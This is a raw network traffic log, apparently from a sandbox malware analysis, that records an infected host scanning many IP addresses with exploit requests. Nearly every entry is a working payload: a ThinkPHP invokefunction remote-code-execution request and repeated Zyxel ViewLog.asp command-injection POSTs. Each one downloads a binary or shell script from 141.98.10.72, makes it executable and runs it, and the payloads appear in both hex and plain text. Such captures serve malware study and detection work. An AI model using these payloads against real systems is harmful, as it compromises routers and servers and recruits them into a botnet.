Feb 14, 2024 09:30:41.445836067 CET	219	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
796	192.168.2.15	59490	95.216.154.226	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:41.261432886 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:41.481606960 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 14 Feb 2024 08:30:41 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
797	192.168.2.15	34350	95.175.122.207	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:41.274544001 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
798	192.168.2.15	39642	95.170.66.222	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:41.636008024 CET	219	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
799	192.168.2.15	50692	31.136.22.114	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.052937984 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:43.736027956 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.079911947 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:47.959820986 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.335711956 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:04.087393999 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:26.359019995 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:09.365540028 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
800	192.168.2.15	39074	31.200.108.225	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.065463066 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
801	192.168.2.15	58518	94.121.124.124	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.065498114 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
802	192.168.2.15	45510	62.150.124.189	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.109034061 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:43.399617910 CET	109	IN	HTTP/1.1 302 Found Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
803	192.168.2.15	58442	85.122.218.156	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.169564962 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
804	192.168.2.15	46080	31.136.31.126	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.259306908 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:43.896123886 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.144005060 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:47.703915119 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:52.823734045 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:02.807480097 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:24.311077118 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:05.269906998 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
805	192.168.2.15	44178	85.221.208.130	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.285439014 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
806	192.168.2.15	46608	94.250.30.198	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.309223890 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
807	192.168.2.15	49522	94.123.46.25	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.312263012 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
808	192.168.2.15	32862	94.123.178.2	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.313064098 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
809	192.168.2.15	39788	94.121.43.239	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.315259933 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
810	192.168.2.15	39952	31.136.144.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.497165918 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:44.184088945 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.527925014 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:48.215806961 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.591983080 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:04.343364954 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
